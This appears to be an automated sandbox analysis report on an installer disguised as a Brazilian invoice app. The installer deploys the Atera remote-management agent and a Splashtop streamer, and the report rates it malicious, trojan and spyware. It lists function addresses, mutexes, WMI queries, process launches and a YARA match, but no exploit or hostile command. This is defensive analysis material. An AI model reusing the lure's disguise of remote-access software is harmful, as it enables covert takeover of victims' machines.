                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4C659035_2_00007FFDEE4C6590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE49E59035_2_00007FFDEE49E590
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE46060035_2_00007FFDEE460600
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4822B035_2_00007FFDEE4822B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40033035_2_00007FFDEE400330
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE48A2F035_2_00007FFDEE48A2F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4A831035_2_00007FFDEE4A8310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40231035_2_00007FFDEE402310
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4840A035_2_00007FFDEE4840A0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47A0C035_2_00007FFDEE47A0C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE46C11035_2_00007FFDEE46C110
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE49C22035_2_00007FFDEE49C220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE45224035_2_00007FFDEE452240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE463EB035_2_00007FFDEE463EB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE487EA035_2_00007FFDEE487EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE495EA035_2_00007FFDEE495EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47FED035_2_00007FFDEE47FED0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E7EC035_2_00007FFDEE3E7EC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE427E7035_2_00007FFDEE427E70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE419F3035_2_00007FFDEE419F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE475F2035_2_00007FFDEE475F20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F7F3035_2_00007FFDEE3F7F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE43FEF035_2_00007FFDEE43FEF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4CBCD035_2_00007FFDEE4CBCD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4BDCC035_2_00007FFDEE4BDCC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4B7D2035_2_00007FFDEE4B7D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE429CF035_2_00007FFDEE429CF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F5E5035_2_00007FFDEE3F5E50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE413E1035_2_00007FFDEE413E10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE415AD035_2_00007FFDEE415AD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE419A6035_2_00007FFDEE419A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE497A6035_2_00007FFDEE497A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE447B3035_2_00007FFDEE447B30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE483AF035_2_00007FFDEE483AF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE429BA035_2_00007FFDEE429BA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4CDB8035_2_00007FFDEE4CDB80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE523C2035_2_00007FFDEE523C20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40BBE035_2_00007FFDEE40BBE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4418DA35_2_00007FFDEE4418DA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40D91035_2_00007FFDEE40D910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE44B9F035_2_00007FFDEE44B9F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4D56D035_2_00007FFDEE4D56D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE48169035_2_00007FFDEE481690
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE48772035_2_00007FFDEE487720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4536E035_2_00007FFDEE4536E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42D77035_2_00007FFDEE42D770
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE52F79035_2_00007FFDEE52F790
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE43F78035_2_00007FFDEE43F780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE53184035_2_00007FFDEE531840
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3FD83035_2_00007FFDEE3FD830
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E74B035_2_00007FFDEE3E74B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E347435_2_00007FFDEE3E3474
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E955C35_2_00007FFDEE3E955C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42F63035_2_00007FFDEE42F630
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ED63435_2_00007FFDEE3ED634
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F564035_2_00007FFDEE3F5640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE44B64735_2_00007FFDEE44B647
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ED28435_2_00007FFDEE3ED284
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47D35035_2_00007FFDEE47D350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EF34035_2_00007FFDEE3EF340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4093D035_2_00007FFDEE4093D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47B37035_2_00007FFDEE47B370
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4BF3E035_2_00007FFDEE4BF3E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE5150F035_2_00007FFDEE5150F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE44F1B035_2_00007FFDEE44F1B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E11B035_2_00007FFDEE3E11B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47917035_2_00007FFDEE479170
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE45F22035_2_00007FFDEE45F220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4F320035_2_00007FFDEE4F3200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B38D56C35_2_00007FFD9B38D56C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B39013D35_2_00007FFD9B39013D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5A32A635_2_00007FFD9B5A32A6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5AF08835_2_00007FFD9B5AF088
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5AADD835_2_00007FFD9B5AADD8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5A24E835_2_00007FFD9B5A24E8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6F2BE835_2_00007FFD9B6F2BE8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6B87CD35_2_00007FFD9B6B87CD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6C3CF135_2_00007FFD9B6C3CF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6C0D9535_2_00007FFD9B6C0D95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B770B7735_2_00007FFD9B770B77
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B774F8835_2_00007FFD9B774F88
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B92466535_2_00007FFD9B924665
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B910E6935_2_00007FFD9B910E69
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B91720935_2_00007FFD9B917209
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B91D10835_2_00007FFD9B91D108
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B91A4FB35_2_00007FFD9B91A4FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B9247F035_2_00007FFD9B9247F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDEE531B70 appears 102 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDEE531D30 appears 114 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDEE5306B0 appears 145 times
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiBinary or memory string: OriginalFilenamewixca.dll\ vs APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: Commandline size = 2930
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: Commandline size = 2930
                                Source: 35.2.AgentPackageMonitoring.exe.1f71cd60000.1.unpack, type: UNPACKEDPEMatched rule: yara_runascs author = Sekoia.io, creation_date = 2023-08-23, classification = TLP:CLEAR, version = 1.0, id = 1720f042-2cc6-4ef1-b66c-fe8a4214366a
                                Source: ICSharpCode.SharpZipLib.dll.1.dr, InflaterInputBuffer.csCryptographic APIs: 'TransformBlock'
                                Source: ICSharpCode.SharpZipLib.dll.1.dr, DeflaterOutputStream.csCryptographic APIs: 'TransformBlock'
                                Source: ICSharpCode.SharpZipLib.dll.1.dr, ZipAESTransform.csCryptographic APIs: 'TransformBlock'
                                Source: AteraAgent.exe.1.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                                Source: AteraAgent.exe0.1.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@108/678@0/11
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA NetworksJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5688:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7320:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5812:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7352:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\GenericDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7868:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_chocolatey.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_ISABUS.HTP.Method
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2200:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2472:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: NULL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5844:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7748:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7292:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\SNMPDevicesFileLock
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\NLogMutexTester
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\NLog-FileFileArchiveLock-c:_program files (x86)_atera networks_ateraagent_packages_agentpackagemonitoring_log.txt
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3288:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1464:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\Global\{bd59231e-97d1-4fc0-a975-80c3fed498b7}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_choco.summary.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMutant created: \BaseNamedObjects\Global\Access_PCI
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2996:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\HttpDevicesFileLock
                                Source: C:\Windows\Temp\SplashtopStreamer.exeMutant created: \BaseNamedObjects\Global\{47B9233E-7E50-46F2-B442-6A53F0D0F508}
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7684:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMutant created: \BaseNamedObjects\Global\ServerDevicesFileLock
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3916:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_03
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF59C1AFBE99E78D01.TMPJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;kDELETE FROM ThresholdDuration WHERE Identifier = @id;
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL);p
